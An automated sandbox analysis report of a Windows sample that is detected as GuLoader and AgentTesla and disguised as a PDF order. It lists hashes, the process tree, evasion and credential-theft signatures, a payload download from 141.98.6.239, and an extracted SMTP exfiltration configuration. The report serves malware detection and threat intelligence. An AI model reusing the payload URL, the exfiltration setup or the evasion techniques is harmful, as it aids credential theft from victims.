Edit tour

Windows Analysis Report
Ordene 501527,pdf.exe

Overview

General Information

Sample Name:	Ordene 501527,pdf.exe
Analysis ID:	680367
MD5:	5162b6782f86f1f24e8610544d159ae9
SHA1:	0d1ead84c74ee462976928783c1f733aa859bc94
SHA256:	6730e52c8075c7e044c2bbaf9f7ad8c0f7f8d03fb23adbd2331adc8b591caec7
Infos:

Detection

AgentTesla, GuLoader

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected AgentTesla

Yara detected GuLoader

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Uses SMTP (mail sending)

PE / OLE file has an invalid certificate

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Dropped file seen in connection with other malware

Classification

Process Tree

System is w10x64native

Ordene 501527,pdf.exe (PID: 4496 cmdline: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" MD5: 5162B6782F86F1F24E8610544D159AE9)

CasPol.exe (PID: 4944 cmdline: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 4428 cmdline: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 4596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

flex.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Roaming\flex\flex.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

flex.exe (PID: 5196 cmdline: "C:\Users\user\AppData\Roaming\flex\flex.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "ventas@merian.com.arofven1mail.merian.com.arkagawabunch869@gmail.com"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.39990186767.00000000037B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000009.00000000.39838910204.0000000001300000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 4428	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 4428	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: flex.exe.7436.14.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "ventas@merian.com.arofven1mail.merian.com.arkagawabunch869@gmail.com"}

Source: Ordene 501527,pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Ordene 501527,pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\FanControlWrapper.pdb source: FanControlWrapper.dll.1.dr
Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\FanControlWrapper.pdb source: FanControlWrapper.dll.1.dr
Source:	Binary string: caspol.pdb source: flex.exe, 0000000E.00000000.40096279867.00000000002F2000.00000002.00000001.01000000.00000008.sdmp, flex.exe.9.dr
Source:	Binary string: Microsoft.Office.Tools.Common.v9.0.pdb source: Microsoft.Office.Tools.Common.v9.0.dll.1.dr

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	Code function: 1_2_004065A2 FindFirstFileW,FindClose,		1_2_004065A2
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	Code function: 1_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		1_2_0040596D

Source: Joe Sandbox View

IP Address: 141.98.6.239 141.98.6.239

Source: global traffic

HTTP traffic detected: GET /zeaveZtePRlRbWLesj75.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 141.98.6.239Cache-Control: no-cache

Source: global traffic

TCP traffic: 192.168.11.20:49796 -> 69.61.116.42:587

Source: global traffic

TCP traffic: 192.168.11.20:49796 -> 69.61.116.42:587

Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239
Source: unknown	TCP traffic detected without corresponding DNS query: 141.98.6.239

Source: CasPol.exe, 00000009.00000002.44519707198.000000001DAE8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.40142393670.0000000020F9F000.00000004.00000800.00020000.00000000.sdmp, Cookies.9.dr	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: CasPol.exe, 00000009.00000003.40142393670.0000000020F9F000.00000004.00000800.00020000.00000000.sdmp, Cookies.9.dr	String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)

Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000009.00000002.44498847642.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.6.239/zeaveZtePRlRbWLesj75.dwp
Source: CasPol.exe, 00000009.00000002.44498847642.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.6.239/zeaveZtePRlRbWLesj75.dwplh
Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://FvewWS.com
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000009.00000002.44498847642.00000000014D6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.merian.com.ar
Source: CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://merian.com.ar
Source: Ordene 501527,pdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 00000009.00000002.44498847642.00000000014D6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Ordene 501527,pdf.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Ordene 501527,pdf.exe	String found in binary or memory: http://s.symcd.com06
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: Ordene 501527,pdf.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Ordene 501527,pdf.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Ordene 501527,pdf.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%appdata
Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%t-
Source: Ordene 501527,pdf.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: Ordene 501527,pdf.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: Ordene 501527,pdf.exe	String found in binary or memory: https://d.symcb.com/rpa0.
Source: CasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000009.00000002.44518958056.000000001DA75000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.40043700714.000000001C831000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519545264.000000001DAD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rwUCPncwlnlg0H1LG.net
Source: CasPol.exe, 00000009.00000002.44518958056.000000001DA75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rwUCPncwlnlg0H1LG.nett-
Source: CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com
Source: CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: CasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: FanControlWrapper.dll.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: mail.merian.com.ar

Source: global traffic

HTTP traffic detected: GET /zeaveZtePRlRbWLesj75.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 141.98.6.239Cache-Control: no-cache

Source: Ordene 501527,pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe

Code function: 1_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_00403350

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_01312168	9_2_01312168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0131233B	9_2_0131233B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_01312366	9_2_01312366
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_1D7B9F18	9_2_1D7B9F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_1D7B9648	9_2_1D7B9648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_1D7B9300	9_2_1D7B9300
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Code function: 14_2_026E0D60	14_2_026E0D60
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Code function: 16_2_02610D60	16_2_02610D60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: String function: 1D7BCF00 appears 54 times

Source: Ordene 501527,pdf.exe, 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameMicrosoft.Office.Tools.Common.v9.0.dlll% vs Ordene 501527,pdf.exe

Source: Ordene 501527,pdf.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: Ordene 501527,pdf.exe

Static PE information: invalid certificate

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\flex\flex.exe 7D3BDB5B7EE9685C7C18C0C3272DA2A593F6C5C326F1EA67F22AAE27C57BA1E6

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe

File read: C:\Users\user\Desktop\Ordene 501527,pdf.exe

Jump to behavior

Source: Ordene 501527,pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ordene 501527,pdf.exe "C:\Users\user\Desktop\Ordene 501527,pdf.exe"
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Ordene 501527,pdf.exe"
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Ordene 501527,pdf.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\flex\flex.exe "C:\Users\user\AppData\Roaming\flex\flex.exe"
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\flex\flex.exe "C:\Users\user\AppData\Roaming\flex\flex.exe"
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe

1_2_00403350

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes

Jump to behavior

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsz2213.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@8/12@1/2

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: flex.exe.9.dr, Microsoft.Tools.Caspol/caspol.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: flex.exe.9.dr, Microsoft.Tools.Caspol/caspol.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.flex.exe.2f0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.flex.exe.2f0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4596:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:304:WilStaging_02

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Ordene 501527,pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\FanControlWrapper.pdb source: FanControlWrapper.dll.1.dr
Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\FanControlWrapper.pdb source: FanControlWrapper.dll.1.dr
Source:	Binary string: caspol.pdb source: flex.exe, 0000000E.00000000.40096279867.00000000002F2000.00000002.00000001.01000000.00000008.sdmp, flex.exe.9.dr
Source:	Binary string: Microsoft.Office.Tools.Common.v9.0.pdb source: Microsoft.Office.Tools.Common.v9.0.dll.1.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.39990186767.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.39838910204.0000000001300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 9_2_013122B2 pushfd ; iretd

9_2_013122E8

Source: FanControlWrapper.dll.1.dr

Static PE information: section name: .nep

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Local\Temp\nsd84B6.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\flex\flex.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dll	Jump to dropped file

